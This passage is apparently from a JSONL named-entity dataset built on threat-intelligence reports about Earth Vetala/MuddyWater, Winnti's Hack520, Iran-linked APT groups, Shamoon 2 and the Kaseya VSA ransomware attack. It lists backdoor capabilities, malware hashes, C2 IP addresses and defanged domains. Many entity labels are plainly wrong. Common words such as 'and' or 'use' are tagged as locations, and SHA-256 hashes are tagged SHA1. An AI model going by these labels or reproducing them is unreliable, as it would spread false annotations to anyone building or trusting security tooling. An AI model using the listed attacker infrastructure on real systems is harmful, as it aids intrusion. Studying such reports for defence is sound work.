backdoor:","entities":[],"relations":[],"Comments":[]} -{"id":6509,"text":" Figure 10. deobfuscated PowerShell backdoor The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor.","entities":[{"id":20163,"label":"attack-pattern","start_offset":29,"end_offset":39},{"id":20164,"label":"location","start_offset":95,"end_offset":99},{"id":20165,"label":"attack-pattern","start_offset":117,"end_offset":127}],"relations":[],"Comments":[]} -{"id":6510,"text":"The PowerShell backdoor has the following capabilities.","entities":[{"id":20166,"label":"attack-pattern","start_offset":4,"end_offset":14}],"relations":[],"Comments":[]} -{"id":6511,"text":" Check for Skype connectivity Download and install Skype Encoded communication with its C2 Execute commands sent from the C2 server Get multifactor authentication settings Get the currently logged on user and OS version Earth Vetala Footprint Earth Vetala conducted an extensive offensive campaign targeting multiple countries.","entities":[{"id":20167,"label":"location","start_offset":1,"end_offset":6},{"id":20168,"label":"location","start_offset":39,"end_offset":42},{"id":20171,"label":"location","start_offset":205,"end_offset":208},{"id":20172,"label":"threat-actor","start_offset":221,"end_offset":233},{"id":20173,"label":"threat-actor","start_offset":244,"end_offset":256},{"id":20174,"label":"location","start_offset":290,"end_offset":298}],"relations":[],"Comments":[]} -{"id":6512,"text":"We observed it operating in the following countries: Azerbaijan Bahrain Israel Saudi Arabia United Arab Emirates Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":6513,"text":"Affected countries We observed Earth Vetala target the following sectors: Government Agencies Academia Tourism Trend Micro Solutions Earth Vetala represents an interesting threat.","entities":[{"id":20181,"label":"threat-actor","start_offset":35,"end_offset":47},{"id":20182,"label":"location","start_offset":48,"end_offset":54},{"id":20183,"label":"location","start_offset":99,"end_offset":107},{"id":20184,"label":"location","start_offset":123,"end_offset":128},{"id":20185,"label":"threat-actor","start_offset":139,"end_offset":151}],"relations":[],"Comments":[]} -{"id":6515,"text":"This is unexpected since we believe this attack is connected to the MuddyWater threat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill.","entities":[{"id":20188,"label":"threat-actor","start_offset":68,"end_offset":78},{"id":20189,"label":"location","start_offset":95,"end_offset":98},{"id":20190,"label":"location","start_offset":161,"end_offset":167}],"relations":[],"Comments":[]} -{"id":6519,"text":" MITRE ATT&CK Techniques Mapping Tactic Technique Resource Development Acquire Infrastructure: Web Services – T1583.006 Initial Access Phishing: Spearphishing Attachment – T1566.001 Phishing: Spearphishing Link – T1566.002 Execution Command and Scripting Interpreter: PowerShell – T1059.001","entities":[{"id":20197,"label":"attack-pattern","start_offset":142,"end_offset":150},{"id":20198,"label":"attack-pattern","start_offset":152,"end_offset":176},{"id":20199,"label":"attack-pattern","start_offset":189,"end_offset":197},{"id":20200,"label":"attack-pattern","start_offset":199,"end_offset":217},{"id":20201,"label":"location","start_offset":250,"end_offset":253},{"id":20202,"label":"attack-pattern","start_offset":254,"end_offset":263},{"id":20203,"label":"attack-pattern","start_offset":277,"end_offset":287}],"relations":[],"Comments":[]} -{"id":6520,"text":"Command and Scripting Interpreter: Windows Command Shell – T1059.003","entities":[{"id":20204,"label":"location","start_offset":8,"end_offset":11},{"id":20205,"label":"attack-pattern","start_offset":12,"end_offset":21},{"id":20206,"label":"location","start_offset":51,"end_offset":56}],"relations":[],"Comments":[]} -{"id":6521,"text":"Command and Scripting Interpreter: Visual Basic – T1059.005 User Execution: Malicious Link – T1204.001 User Execution: Malicious File – T1204.002 Persistence, Privilege Escalation Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder - T1547.001 Discovery Account Discovery: Domain Account - T1087.002 Credential Access Credentials from Password Stores: Credentials from Web Browsers – T1555.003 Command and Control Data Encoding: Standard Encoding – T1132.001 Defense Evasion Deobfuscate\/Decode Files or Information - T1140 Indicators of Compromise Files File name SHA-256 Trend Micro Detection Name Description SharpChisel.exe 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2 HackTool.MSIL.Chisel.A SharpChisel tunneling tool PD64.dll ccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131 Trojan.Win64.PASSDUMP.A File used by HackTool.Win64.PassDump.AC PasswordDumper.exe 0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3 HackTool.Win64.PassDump.AC","entities":[{"id":20207,"label":"location","start_offset":8,"end_offset":11},{"id":20208,"label":"attack-pattern","start_offset":12,"end_offset":21},{"id":20209,"label":"attack-pattern","start_offset":60,"end_offset":74},{"id":20210,"label":"attack-pattern","start_offset":103,"end_offset":117},{"id":20211,"label":"attack-pattern","start_offset":159,"end_offset":179},{"id":20212,"label":"location","start_offset":236,"end_offset":243},{"id":20213,"label":"attack-pattern","start_offset":275,"end_offset":292},{"id":20214,"label":"location","start_offset":426,"end_offset":429},{"id":20215,"label":"attack-pattern","start_offset":439,"end_offset":452},{"id":20216,"label":"location","start_offset":454,"end_offset":462},{"id":20217,"label":"location","start_offset":608,"end_offset":613},{"id":20218,"label":"SHA1","start_offset":657,"end_offset":721},{"id":20219,"label":"location","start_offset":767,"end_offset":771},{"id":20220,"label":"SHA2","start_offset":781,"end_offset":845},{"id":20221,"label":"SHA2","start_offset":929,"end_offset":993}],"relations":[],"Comments":[]} -{"id":6522,"text":"Password dumping tool out1.exe 79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6 HackTool.Win64.Lazagne.","entities":[{"id":20222,"label":"location","start_offset":17,"end_offset":21},{"id":20223,"label":"SHA1","start_offset":31,"end_offset":95}],"relations":[],"Comments":[]} -{"id":6523,"text":"Pyinstaller remote access tool newsblog.js 304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8 Trojan.JS.DLOADR.AUSUOL VBS downloader new.exe fb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2 HackTool.Win64.LIGOLO.A LIGOLO tunneling tool Browser64.exe 3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584fea HackTool.Win64.BrowserDumper.A","entities":[{"id":20224,"label":"location","start_offset":12,"end_offset":18},{"id":20225,"label":"location","start_offset":26,"end_offset":30},{"id":20226,"label":"SHA2","start_offset":43,"end_offset":107},{"id":20227,"label":"SHA2","start_offset":155,"end_offset":219},{"id":20228,"label":"location","start_offset":261,"end_offset":265},{"id":20229,"label":"SHA1","start_offset":280,"end_offset":344}],"relations":[],"Comments":[]} -{"id":6524,"text":"Tool for accessing browser DBs 1.exe 78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347 HackTool.Win64.LIGOLO.A LIGOLO tunneling tool ","entities":[{"id":20230,"label":"location","start_offset":0,"end_offset":4},{"id":20231,"label":"SHA2","start_offset":37,"end_offset":101},{"id":20232,"label":"location","start_offset":143,"end_offset":147}],"relations":[],"Comments":[]} -{"id":6525,"text":"مکتبة إلکترونیة.pdf 70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b Trojan.","entities":[{"id":20233,"label":"SHA1","start_offset":20,"end_offset":84}],"relations":[],"Comments":[]} -{"id":6526,"text":"PDF.RemoteUtilities.A","entities":[],"relations":[],"Comments":[]} -{"id":6527,"text":"PDF with embedded URLs 468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254 Trojan.W97M.RemoteUtilities.A RTF with embedded URLs","entities":[{"id":20234,"label":"SHA2","start_offset":25,"end_offset":89}],"relations":[],"Comments":[]} -{"id":6528,"text":"مکتبة إلکترونیة .zip f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393 PUA.Win32.RemoteUtilities.A Archive containing RemoteUtilities","entities":[{"id":20235,"label":"SHA2","start_offset":21,"end_offset":85},{"id":20236,"label":"malware","start_offset":133,"end_offset":148}],"relations":[],"Comments":[]} -{"id":6529,"text":"مکتبة إلکترونیة.exe f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376 PUA.Win32.RemoteUtilities.A RemoteUtilities remote access software برنامج.zip 8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f PUA.Win32.RemoteUtilities.A","entities":[{"id":20237,"label":"SHA1","start_offset":20,"end_offset":84},{"id":20238,"label":"malware","start_offset":113,"end_offset":128},{"id":20239,"label":"location","start_offset":129,"end_offset":135},{"id":20240,"label":"SHA2","start_offset":163,"end_offset":227}],"relations":[],"Comments":[]} -{"id":6530,"text":"Archive containing RemoteUtilities برنامجدولیة.zip 9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27 PUA.Win32.RemoteUtilities.A Archive containing RemoteUtilities","entities":[{"id":20241,"label":"malware","start_offset":19,"end_offset":34},{"id":20242,"label":"SHA2","start_offset":51,"end_offset":115},{"id":20243,"label":"malware","start_offset":163,"end_offset":178}],"relations":[],"Comments":[]} -{"id":6531,"text":"ورش مجانية.zip 5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990dd PUA.Win32.RemoteUtilities.A Archive containing RemoteUtilities مکتالمنحالدراسیة.zip b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf PUA.Win32.ScreenConnect.P Archive containing ScreenConnect المنح الدرایةس.exe 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b PUA.Win32.ScreenConnect.P ScreenConnect remote access software Network 23.94.50.197:444 23.95.215.100:443 23.95.215.100:8080 87.236.212.184:443 87.236.212.184:8008 Tags APT & Targeted Attacks | Articles, News, Reports |","entities":[{"id":20244,"label":"SHA1","start_offset":15,"end_offset":79},{"id":20245,"label":"malware","start_offset":127,"end_offset":142},{"id":20246,"label":"SHA2","start_offset":164,"end_offset":228},{"id":20247,"label":"malware","start_offset":274,"end_offset":287},{"id":20248,"label":"SHA2","start_offset":307,"end_offset":371},{"id":20249,"label":"malware","start_offset":398,"end_offset":411},{"id":20250,"label":"location","start_offset":412,"end_offset":418},{"id":20251,"label":"location","start_offset":549,"end_offset":552}],"relations":[],"Comments":[]} -{"id":6532,"text":"Research","entities":[],"relations":[],"Comments":[]} -{"id":6533,"text":"Updated on April 26, 2017, 01:39 PM (UTC-7) to add the accurate IP address.","entities":[{"id":20253,"label":"TIME","start_offset":27,"end_offset":43}],"relations":[],"Comments":[]} -{"id":6543,"text":"In particular, we managed to gather details on an individual using the handle Hack520, who we believe is connected to Winnti.","entities":[],"relations":[],"Comments":[]} -{"id":6544,"text":"Who is the Winnti group?","entities":[],"relations":[],"Comments":[]} -{"id":6546,"text":"Based on the use of domain names they registered, the group started out in the business of fake\/rogue anti-virus products in 2007.","entities":[{"id":20294,"label":"malware","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} -{"id":6548,"text":"The group, which was primarily motivated by profit, is noted for utilizing self-developed technically-proficient tools for their attacks.","entities":[],"relations":[],"Comments":[]} -{"id":6549,"text":"They once attacked a game server to illicitly farm in-game currency (“gaming gold”, which also has real-world value) and stole source codes of online game projects.","entities":[{"id":20301,"label":"location","start_offset":70,"end_offset":76},{"id":20302,"label":"location","start_offset":77,"end_offset":81},{"id":20303,"label":"location","start_offset":99,"end_offset":103},{"id":20304,"label":"location","start_offset":104,"end_offset":109},{"id":20305,"label":"location","start_offset":117,"end_offset":120},{"id":20306,"label":"attack-pattern","start_offset":127,"end_offset":133}],"relations":[],"Comments":[]} -{"id":6552,"text":"The group has since earned infamy for being involved in malicious activities associated with targeted attacks, such as deploying spear-phishing campaigns and building a backdoor.","entities":[{"id":20310,"label":"location","start_offset":129,"end_offset":134},{"id":20311,"label":"attack-pattern","start_offset":135,"end_offset":143},{"id":20312,"label":"location","start_offset":154,"end_offset":157}],"relations":[],"Comments":[]} -{"id":6554,"text":"These samples led us to the discovery of additional C&C servers that provided us with more information than we initially expected.","entities":[],"relations":[],"Comments":[]} -{"id":6555,"text":"A closer look at Hack520","entities":[],"relations":[],"Comments":[]} -{"id":6556,"text":"Our initial investigation on the domains registered by Hack520 revealed that similar domains (listed below) were registered by another profile.","entities":[],"relations":[],"Comments":[]} -{"id":6557,"text":" hack520[.]co[.]kr shaiya[.]kr zhu[.]kr shenqi[.]kr zhuxian[.]kr Several of these domains are linked to variants of malware that were used by the Winnti threat actor.","entities":[{"id":20316,"label":"location","start_offset":91,"end_offset":94},{"id":20317,"label":"malware","start_offset":147,"end_offset":153}],"relations":[],"Comments":[]} -{"id":6559,"text":"Figure 1: Twitter account of Hack520","entities":[],"relations":[],"Comments":[]} -{"id":6567,"text":"A rough translation of this message is as follows: “Fxxk, when I am released, the server is offline, I can’t find the machine, the domain is expired, it is so bad.","entities":[],"relations":[],"Comments":[]} -{"id":6570,"text":"After further research, we were able to link Hack520 to different network administration activities, notably with a Virtual Private Server (VPS) hosting service.","entities":[],"relations":[],"Comments":[]} -{"id":6572,"text":"While one of his signatures uses his own blog domain, there is also a second signature which uses 93[.]gd, a domain that was found to have been actively selling VPS services in the past.","entities":[],"relations":[],"Comments":[]} -{"id":6573,"text":"The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “PIG GOD”—another reference to Hack520’s passion for pigs.","entities":[],"relations":[],"Comments":[]} -{"id":6575,"text":"The IP range for “PIG GOD” is 43[.]255[.]188.0\/22, which appears to be hosted in Hong Kong as seen in the information we found: inetnum: 43[.]255[.]188[.]0 - 43[.]255[.]191[.]255 netname: PIG-HK description: PIG GOD country: HK admin-c: PG406-AP tech-c: PG406-AP person: pig god country: HK phone: +852-39437000 e-mail: admin@66[.]to nic-hdl: PG406-AP mnt-by: MAINT-RAIBOW-HK changed: admin@66[.]to 20160917 source: APNIC The domain 66[.]to leads to another website that shows Hack520’s pet pig.","entities":[{"id":20354,"label":"location","start_offset":7,"end_offset":12},{"id":20355,"label":"location","start_offset":22,"end_offset":25},{"id":20356,"label":"identity","start_offset":81,"end_offset":90},{"id":20357,"label":"IPV4","start_offset":138,"end_offset":156},{"id":20358,"label":"IPV4","start_offset":159,"end_offset":179},{"id":20359,"label":"location","start_offset":213,"end_offset":216},{"id":20360,"label":"location","start_offset":264,"end_offset":270},{"id":20361,"label":"location","start_offset":276,"end_offset":279},{"id":20364,"label":"attack-pattern","start_offset":409,"end_offset":415}],"relations":[],"Comments":[]} -{"id":6577,"text":"Figure 3: Hack520’s pet pig","entities":[],"relations":[],"Comments":[]} -{"id":6580,"text":"We also found a live service selling VPS hosting at secure[.]66[.]to.","entities":[],"relations":[],"Comments":[]} -{"id":6583,"text":" Figure 4: Screenshot of secure[.]66[.]to","entities":[],"relations":[],"Comments":[]} -{"id":6592,"text":"Threat actors are always looking to expand the strategies they use, thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time, resources and manpower to accomplish their goals.","entities":[{"id":20410,"label":"location","start_offset":14,"end_offset":17},{"id":20411,"label":"malware","start_offset":36,"end_offset":42},{"id":20412,"label":"location","start_offset":73,"end_offset":81},{"id":20413,"label":"location","start_offset":92,"end_offset":95},{"id":20414,"label":"location","start_offset":191,"end_offset":194},{"id":20415,"label":"location","start_offset":212,"end_offset":216},{"id":20416,"label":"location","start_offset":228,"end_offset":231}],"relations":[],"Comments":[]} -{"id":6601,"text":"Overview of Iran-Linked Campaigns:","entities":[],"relations":[],"Comments":[]} -{"id":6606,"text":"The target radius for these groups have spanned across the globe, across all major industries.","entities":[{"id":20467,"label":"location","start_offset":4,"end_offset":10},{"id":20468,"label":"malware","start_offset":59,"end_offset":64},{"id":20469,"label":"location","start_offset":77,"end_offset":82}],"relations":[],"Comments":[]} -{"id":6608,"text":"Iranian TTPs:","entities":[],"relations":[],"Comments":[]} -{"id":6611,"text":"General Mitigations:","entities":[],"relations":[],"Comments":[]} -{"id":6613,"text":" https:\/\/attack.mitre.org\/groups\/G0049\/ OilRig is a threat group Unit 42 named and discovered in May 2016.","entities":[{"id":20492,"label":"malware","start_offset":41,"end_offset":47},{"id":20494,"label":"location","start_offset":80,"end_offset":83}],"relations":[],"Comments":[]} -{"id":6615,"text":"This threat group is extremely persistent and relies heavily on spear-phishing as their initial attack vector, but has also been associated with other more sophisticated attacks such credential harvesting campaigns and DNS hijacking.","entities":[{"id":20497,"label":"location","start_offset":42,"end_offset":45},{"id":20498,"label":"location","start_offset":64,"end_offset":69},{"id":20499,"label":"attack-pattern","start_offset":70,"end_offset":78},{"id":20500,"label":"tools","start_offset":103,"end_offset":109},{"id":20501,"label":"location","start_offset":215,"end_offset":218}],"relations":[],"Comments":[]} -{"id":6616,"text":"In their spear-phishing attacks, OilRig preferred macro-enabled Microsoft Office (Word and Excel) documents to install their custom payloads that came in the form of portable executables (PE), PowerShell and VBScripts.","entities":[{"id":20502,"label":"location","start_offset":9,"end_offset":14},{"id":20503,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20506,"label":"tools","start_offset":74,"end_offset":80},{"id":20508,"label":"location","start_offset":87,"end_offset":90},{"id":20510,"label":"attack-pattern","start_offset":193,"end_offset":203},{"id":20511,"label":"location","start_offset":204,"end_offset":207}],"relations":[],"Comments":[]} -{"id":6618,"text":" Once gaining access to an end point, actors would use credential dumping tools, such as Mimikatz to gather credentials to legitimate accounts to then move laterally to other systems on the network.","entities":[{"id":20514,"label":"location","start_offset":31,"end_offset":36},{"id":20515,"label":"attack-pattern","start_offset":55,"end_offset":73},{"id":20516,"label":"malware","start_offset":89,"end_offset":97}],"relations":[],"Comments":[]} -{"id":6620,"text":" https:\/\/unit42.paloaltonetworks.com\/behind-the-scenes-with-oilrig\/","entities":[],"relations":[],"Comments":[]} -{"id":6621,"text":" https:\/\/unit42.paloaltonetworks.com\/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling\/ https:\/\/unit42.paloaltonetworks.com\/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-performs-tests-twoface-webshell\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan\/ https:\/\/unit42.paloaltonetworks.com\/unit42-striking-oil-closer-look-adversary-infrastructure\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group\/ https:\/\/unit42.paloaltonetworks.com\/unit42-oilrig-actors-provide-glimpse-development-testing-efforts\/ https:\/\/unit42.paloaltonetworks.com\/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor\/ https:\/\/attack.mitre.org\/groups\/G0059\/ The Magic Hound campaign targeted energy, government, and technology organizations with spear-phishing emails as a delivery mechanism. These emails delivered macro-enabled Microsoft Office documents and PE files within attachments. The documents and executables attached to emails would install a variety of tools from portable PE files, .NET Framework PE files, Meterpreter, IRC bots, an open sourced Meterpreter module called Magic Unicorn, and an open sourced Python RAT called Pupy. The custom tools used in the Magic Hound campaign provided connections to other threat groups, such as the IRC Bot which was very similar to the Parastoo tool associated with the NEWSCASTER threat group.","entities":[{"id":20520,"label":"URL","start_offset":1,"end_offset":97},{"id":20521,"label":"URL","start_offset":99,"end_offset":201},{"id":20523,"label":"URL","start_offset":313,"end_offset":428},{"id":20526,"label":"URL","start_offset":642,"end_offset":737},{"id":20533,"label":"URL","start_offset":1346,"end_offset":1467},{"id":20534,"label":"URL","start_offset":1469,"end_offset":1507},{"id":20535,"label":"threat-actor","start_offset":1513,"end_offset":1524},{"id":20536,"label":"location","start_offset":1525,"end_offset":1533},{"id":20537,"label":"location","start_offset":1543,"end_offset":1549},{"id":20538,"label":"location","start_offset":1563,"end_offset":1566},{"id":20539,"label":"location","start_offset":1597,"end_offset":1602},{"id":20540,"label":"attack-pattern","start_offset":1603,"end_offset":1611},{"id":20541,"label":"identity","start_offset":1681,"end_offset":1690},{"id":20542,"label":"tools","start_offset":1691,"end_offset":1697},{"id":20543,"label":"location","start_offset":1708,"end_offset":1711},{"id":20544,"label":"location","start_offset":1755,"end_offset":1758},{"id":20545,"label":"malware","start_offset":1872,"end_offset":1883},{"id":20546,"label":"malware","start_offset":1911,"end_offset":1922},{"id":20547,"label":"location","start_offset":1952,"end_offset":1955},{"id":20549,"label":"threat-actor","start_offset":2026,"end_offset":2037},{"id":20550,"label":"location","start_offset":2038,"end_offset":2046},{"id":20552,"label":"location","start_offset":2151,"end_offset":2155},{"id":20553,"label":"threat-actor","start_offset":2176,"end_offset":2186}],"relations":[],"Comments":[]} -{"id":6622,"text":"Also, a Magic Hound C2 server was also used as a C2 server for a tool called MPKBot that had been associated with the Rocket Kitten threat group.","entities":[{"id":20555,"label":"location","start_offset":65,"end_offset":69},{"id":20557,"label":"threat-actor","start_offset":118,"end_offset":131}],"relations":[],"Comments":[]} -{"id":6623,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-magic-hound-campaign-attacks-saudi-targets\/","entities":[],"relations":[],"Comments":[]} -{"id":6624,"text":" https:\/\/attack.mitre.org\/groups\/G0064\/","entities":[],"relations":[],"Comments":[]} -{"id":6626,"text":"They use spear-phishing attacks with a domain masquerading technique to make the links in their emails appear legitimate.","entities":[{"id":20564,"label":"location","start_offset":9,"end_offset":14},{"id":20565,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20566,"label":"attack-pattern","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} -{"id":6628,"text":"A recent report uncovered this threat group’s attack infrastructure, which leveraged commercial VPN providers in addition to compromised systems to use as proxies to further mask their origins.","entities":[{"id":20569,"label":"threat-actor","start_offset":174,"end_offset":178}],"relations":[],"Comments":[]} -{"id":6630,"text":" https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/09\/apt33-insights-into-iranian-cyber-espionage.html https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting\/","entities":[{"id":20573,"label":"URL","start_offset":1,"end_offset":102},{"id":20574,"label":"URL","start_offset":104,"end_offset":241}],"relations":[],"Comments":[]} -{"id":6631,"text":" https:\/\/attack.mitre.org\/groups\/G0079\/","entities":[{"id":20575,"label":"URL","start_offset":1,"end_offset":39}],"relations":[],"Comments":[]} -{"id":6632,"text":" The DarkHydrus threat group has targeted government entities and educational institutions with spear-phishing attacks and credential harvesting campaigns.","entities":[{"id":20576,"label":"threat-actor","start_offset":5,"end_offset":15},{"id":20577,"label":"location","start_offset":62,"end_offset":65},{"id":20578,"label":"location","start_offset":96,"end_offset":101},{"id":20579,"label":"attack-pattern","start_offset":102,"end_offset":110},{"id":20580,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} -{"id":6633,"text":"DarkHydrus is a more sophisticated group when compared to others operating in the region, as their toolset and TTPs show a higher skill level.","entities":[{"id":20581,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":20582,"label":"location","start_offset":82,"end_offset":88},{"id":20583,"label":"location","start_offset":107,"end_offset":110}],"relations":[],"Comments":[]} -{"id":6634,"text":"DarkHydrus has used custom tools in addition to publicly available red-teaming tools such as Phishery.","entities":[],"relations":[],"Comments":[]} -{"id":6635,"text":"They have also been observed using Google Drive for their C2 channel.","entities":[],"relations":[],"Comments":[]} -{"id":6636,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government\/ https:\/\/unit42.paloaltonetworks.com\/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east\/ https:\/\/unit42.paloaltonetworks.com\/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications\/","entities":[],"relations":[],"Comments":[]} -{"id":6640,"text":"Since the original 2012 attack, two other instances of Shamoon have been discovered, in 2016 as well as 2018.","entities":[],"relations":[],"Comments":[]} -{"id":6642,"text":" https:\/\/securelist.com\/shamoon-the-wiper-copycats-at-work\/57854\/","entities":[{"id":20608,"label":"URL","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":6643,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-shamoon-2-return-disttrack-wiper\/","entities":[],"relations":[],"Comments":[]} -{"id":6644,"text":" https:\/\/unit42.paloaltonetworks.com\/unit42-second-wave-shamoon-2-attacks-identified\/ https:\/\/unit42.paloaltonetworks.com\/unit42-shamoon-2-delivering-disttrack\/ https:\/\/unit42.paloaltonetworks.com\/shamoon-3-targets-oil-gas-organization\/ https:\/\/unit42.paloaltonetworks.com\/shamoon-3-modified-open-source-wiper-contains-verse-from-the-quran\/ ","entities":[{"id":20610,"label":"URL","start_offset":1,"end_offset":85},{"id":20612,"label":"URL","start_offset":163,"end_offset":238}],"relations":[],"Comments":[]} -{"id":6645,"text":"MuddyWater is a group that emerged in 2017 and was initially thought to be part of the financially motivated criminal group commonly referred to as FIN7 due to the use of an open source tool that was used by both sets of activity.","entities":[{"id":20614,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":20616,"label":"location","start_offset":43,"end_offset":46},{"id":20618,"label":"attack-pattern","start_offset":179,"end_offset":185},{"id":20619,"label":"location","start_offset":186,"end_offset":190}],"relations":[],"Comments":[]} -{"id":6647,"text":"This group generally used spear-phishing with macro-enabled Office documents to deliver their payloads, which were either embedded directly in the macro, or hosted on a first stage C2 server.","entities":[{"id":20622,"label":"location","start_offset":26,"end_offset":31},{"id":20623,"label":"attack-pattern","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} -{"id":6649,"text":"A significant portion of MuddyWater’s toolset consisted of open sourced red-teaming tools such as Invoke-Obfuscation, Lazagne, Mimikatz, etc. https:\/\/unit42.paloaltonetworks.com\/unit42-muddying-the-water-targeted-attacks-in-the-middle-east\/ https:\/\/securelist.com\/muddywater\/88059\/ https:\/\/www.clearskysec.com\/muddywater2\/ https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools\/ ","entities":[],"relations":[],"Comments":[]} -{"id":6650,"text":"Assuming the highlighted groups are indeed Iranian in origin, their activity has been well documented and the various groups often times use very similar tactics and techniques to execute their attacks, such as the heavy use of spear-phishing and credential harvesting.","entities":[{"id":20638,"label":"location","start_offset":32,"end_offset":35},{"id":20640,"label":"location","start_offset":102,"end_offset":105},{"id":20641,"label":"location","start_offset":162,"end_offset":165},{"id":20642,"label":"location","start_offset":228,"end_offset":233},{"id":20643,"label":"attack-pattern","start_offset":234,"end_offset":242},{"id":20644,"label":"location","start_offset":243,"end_offset":246}],"relations":[],"Comments":[]} -{"id":6656,"text":"Link to IOCs on GitHub ","entities":[],"relations":[],"Comments":[]} -{"id":6661,"text":"This post is also available in: 日本語 (Japanese) Palo Alto Networks Unit 42 threat intelligence team has just released new research that has uncovered a previously unknown second wave of Shamoon 2 attacks: Second Wave of Shamoon 2 Attacks Identified Based on our analysis, these attacks were timed to occur on November 29, 2016, twelve days after the initial Shamoon 2 attacks that we wrote about previously. ","entities":[{"id":20662,"label":"location","start_offset":5,"end_offset":9},{"id":20664,"label":"identity","start_offset":53,"end_offset":71},{"id":20665,"label":"identity","start_offset":72,"end_offset":79},{"id":20666,"label":"identity","start_offset":109,"end_offset":113},{"id":20668,"label":"tools","start_offset":191,"end_offset":198},{"id":20669,"label":"malware","start_offset":225,"end_offset":232},{"id":20672,"label":"tools","start_offset":364,"end_offset":371}],"relations":[],"Comments":[]} -{"id":6662,"text":"Like the initial Shamoon 2 attacks, this second wave of Shamoon 2 attacks utilize the Disttrack wiper malware.","entities":[{"id":20673,"label":"tools","start_offset":17,"end_offset":24},{"id":20675,"label":"tools","start_offset":56,"end_offset":63},{"id":20677,"label":"tools","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} -{"id":6665,"text":" But this second wave of Shamoon 2 attacks show evidence of potential new tactic.","entities":[],"relations":[],"Comments":[]} -{"id":6667,"text":"VDI solutions can provide protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems to recover from a wiper attack.","entities":[{"id":20693,"label":"location","start_offset":14,"end_offset":17},{"id":20694,"label":"location","start_offset":26,"end_offset":36},{"id":20696,"label":"location","start_offset":105,"end_offset":109},{"id":20697,"label":"malware","start_offset":155,"end_offset":160}],"relations":[],"Comments":[]} -{"id":6676,"text":"They used access to the VSA software to deploy ransomware associated with the REvil\/Sodinokibi ransomware-as-a-service group, according to reports.","entities":[{"id":20733,"label":"malware","start_offset":78,"end_offset":83},{"id":20734,"label":"threat-actor","start_offset":84,"end_offset":94}],"relations":[],"Comments":[]} -{"id":6678,"text":"The company has not released further information on the vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":6679,"text":"Kaseya recommends that any organization using VSA shut the system down immediately.","entities":[],"relations":[],"Comments":[]} -{"id":6680,"text":"CISA has also issued a bulletin asking organizations using the software to follow Kaseya guidance.","entities":[],"relations":[],"Comments":[]} -{"id":6681,"text":" The full extent of the attack is currently unknown.","entities":[],"relations":[],"Comments":[]} -{"id":6685,"text":"If an MSP’s VSA system was compromised, that could allow an attacker to deploy malware into multiple networks managed by that MSP.","entities":[],"relations":[],"Comments":[]} -{"id":6687,"text":"We have not been able to independently determine how these attacks were 